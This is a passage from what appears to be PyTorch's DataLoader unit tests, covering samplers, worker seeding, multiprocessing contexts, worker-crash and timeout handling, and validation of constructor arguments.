def __init__(self, len, size):
super(RandomDataset, self).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests if the child process forked by the DataLoader segfaults due to having more than 3 threads
# in the parent process after at least one set_num_threads invocation in the parent process.
# After forking, set_num_threads(1) in the child process entails handling some inherited data-structures
# of the Caffe2 thread-pool of the parent process, culminating in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
# Test that the data loader exits cleanly when the process errors while
# 1. holding a reference to the iterator
# 2. using a sampler that yields big elements s.t. _index_queues putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
def test_invalid_ctor_args_combinations(self):
# general
with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
self._get_data_loader(self.dataset, num_workers=-1)
with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
self._get_data_loader(self.dataset, timeout=-1)
# disable auto-batching
with self.assertRaisesRegex(ValueError,
"batch_size=None option disables auto-batching and is mutually exclusive"):
self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
# map-style
sampler = torch.utils.data.SequentialSampler(self.dataset)
batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
# iterable-style
dataset = CountingIterableDataset(20)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=True)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
torch.utils.data.SequentialSampler(dataset), 3, False))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
# this IterableDataset isn't sharded per worker, so for
# the equality test below to be valid, we cannot have more than 1 worker.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
def test_iterable_style_dataset(self):
# [no auto-batching] single process loading
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, batch_size=None)
fetched = list(dataloader)
self.assertEqual(len(fetched), 20)
for i, d in enumerate(fetched):
# non-batched should not convert ints into tensors
self.assertIsInstance(d, int)
self.assertEqual(d, i)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# [no auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
worker_init_fn=set_faulthandler_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = sorted(dataloader_iter)
for a, b in zip(fetched, expected):
# non-batched should not convert ints into tensors
self.assertIsInstance(a, int)
self.assertEqual(a, b)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# When loading more than len(dataset) data, after accessing len(dataloader),
# we should get a warning. See NOTE [ IterableDataset and __len__ ].
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, num_workers=num_workers,
worker_init_fn=set_faulthandler_if_available,
prefetch_factor=prefetch_factor)
it = iter(dataloader)
for _ in range(40):
self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
self.assertEqual(len(dataloader), len(dataset))
self.assertEqual(len(dataloader), 20)
it = iter(dataloader)
for _ in range(20):
self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
for _ in range(3):
with self.assertWarnsRegex(
UserWarning,
r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
msg="Should always warn after exceeding length"):
next(it)
# [no auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7))
self.assertEqual(len(fetched), 3)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
# [auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batch
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 4)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
# [auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching & drop_last] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
self.assertEqual(len(fetched), 2)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
# [auto-batching & drop_last] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batch
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
worker_init_fn=set_faulthandler_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 2)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
# [auto-batching & drop_last] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
@unittest.skipIf(IS_MACOS, "Not working on macOS")
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# windows and jetson devices don't support sharing cuda tensor; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS and not IS_JETSON:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
@skipIfNoNumpy
def test_multiprocessing_iterdatapipe(self):
# Testing to make sure that function from global scope (e.g. imported from library) can be serialized
# and used with multiprocess DataLoader
reference = [torch.as_tensor([[2, 3, 4, 5]], dtype=torch.int64),
torch.as_tensor([[2, 3, 4, 5]], dtype=torch.int64)]
datapipe: IterDataPipe = IterableWrapper([[1, 2, 3, 4], [1, 2, 3, 4, 5, 6]])
datapipe = datapipe.map(row_processor)
datapipe = datapipe.filter(lambda row: len(row) == 4) if HAS_DILL else datapipe.filter(filter_len)
dl_common_args = dict(num_workers=2, batch_size=2, shuffle=True, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
self.assertEqual(reference,
[t.type(torch.int64)
for t in self._get_data_loader(datapipe, multiprocessing_context=ctx, **dl_common_args)])
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(reference,
[t.type(torch.int64)
for t in
self._get_data_loader(datapipe, multiprocessing_context=ctx, **dl_common_args)])
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_multi_epochs_reproducibility(self):
num_workers = 2
batch_size = 10
num_epochs = 3
dataset = TestMultiEpochDataset(batch_size * num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size,
shuffle=False, num_workers=num_workers)
for ind in range(num_epochs):
for batch_idx, sample in enumerate(dataloader):
self.assertEqual(sample.tolist(), [batch_idx % num_workers] * batch_size)
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
def test_sequential_batch_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
def test_sequential_batch_workers_prefetch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement and without specified num_samples
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# test sample without replacement and with specified num_samples
n = len(self.dataset) * 2
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == len(self.dataset))
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
n = len(self.dataset) - 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
n = len(self.dataset) + 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 1)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=True,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(int(math.ceil(float(num_samples) / batch_size)),
count_num_samples_in_data_loader)
def test_random_sampler_len_without_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=False,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples // batch_size + (num_samples % batch_size > 0),
count_num_samples_in_data_loader)
def test_distributed_sampler_invalid_rank(self):
from torch.utils.data.distributed import DistributedSampler
dataset = torch.IntTensor(range(10))
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, 3)
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
from torch.utils.data.distributed import DistributedSampler
num_processes = 4
num_batches = 9
data_set = torch.IntTensor(range(num_batches))
scanned_data = torch.IntTensor([])
for i in range(num_processes):
s = DistributedSampler(data_set, num_processes, i)
d_loader = self._get_data_loader(data_set, batch_size=int(num_batches / num_processes), drop_last=True, sampler=s)
for data in d_loader:
scanned_data = torch.cat((scanned_data, data), 0)
self.assertEqual(scanned_data.size(), scanned_data.unique().size())
def test_sampler_reproducibility(self):
from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
for fn in (
lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
for sampler in (
RandomSampler(self.dataset, num_samples=5, replacement=True),
RandomSampler(self.dataset, replacement=False),
WeightedRandomSampler(weights, num_samples=5, replacement=True),
WeightedRandomSampler(weights, num_samples=5, replacement=False),
SubsetRandomSampler(range(10)),
):
torch.manual_seed(0)
l1 = list(sampler) + list(sampler)
torch.manual_seed(0)
l2 = list(sampler) + list(sampler)
self.assertEqual(l1, l2)
its = (iter(sampler), iter(sampler))
ls = ([], [])
for idx in range(len(sampler)):
for i in range(2):
if idx == 0:
torch.manual_seed(0)
ls[i].append(next(its[i]))
self.assertEqual(ls[0], ls[1])
def _test_sampler(self, **kwargs):
indices = range(2, 12) # using a regular iterable
dl = self._get_data_loader(self.dataset, sampler=indices, batch_size=2, **kwargs)
self.assertEqual(len(dl), 5)
for i, (input, _target) in enumerate(dl):
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[i * 2 + 2:i * 2 + 4])
def test_sampler(self):
self._test_sampler()
self._test_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = [] # using a regular iterable
for i in range(0, 20, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 8)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = self._get_data_loader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
from torch.utils.data._utils.worker import _generate_state
# Use NumPy-generated states as the reference to check that
# `_generate_state` produces the same result.
# Test case: ((worker_id, base_seed), expected_state)
test_cases = [
((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
]
for (worker_id, base_seed), exp in test_cases:
self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
self._test_error(self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True))
def test_error_workers(self):
self._test_error(self._get_data_loader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
r"""Check that workers exit even if the iterator is not exhausted."""
if TEST_CUDA:
pin_memory_configs = (True, False)
else:
pin_memory_configs = (False,)
for pin_memory in pin_memory_configs:
loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
workers = loader._workers
if pin_memory:
pin_memory_thread = loader._pin_memory_thread
for i, _ in enumerate(loader):
if i == 10:
break
assert i == 10
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
if pin_memory:
pin_memory_thread.join(JOIN_TIMEOUT)
self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
r"""There might be ConnectionResetError or leaked semaphore warnings
(due to dirty process exit), but they are all safe to ignore."""
# TODO: test the case where the pin_memory_thread triggers an
# error/fatal signal. I haven't found out how to properly do that.
for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
itertools.product([True, False], repeat=4):
# `hold_iter_reference` specifies whether we hold a reference to the
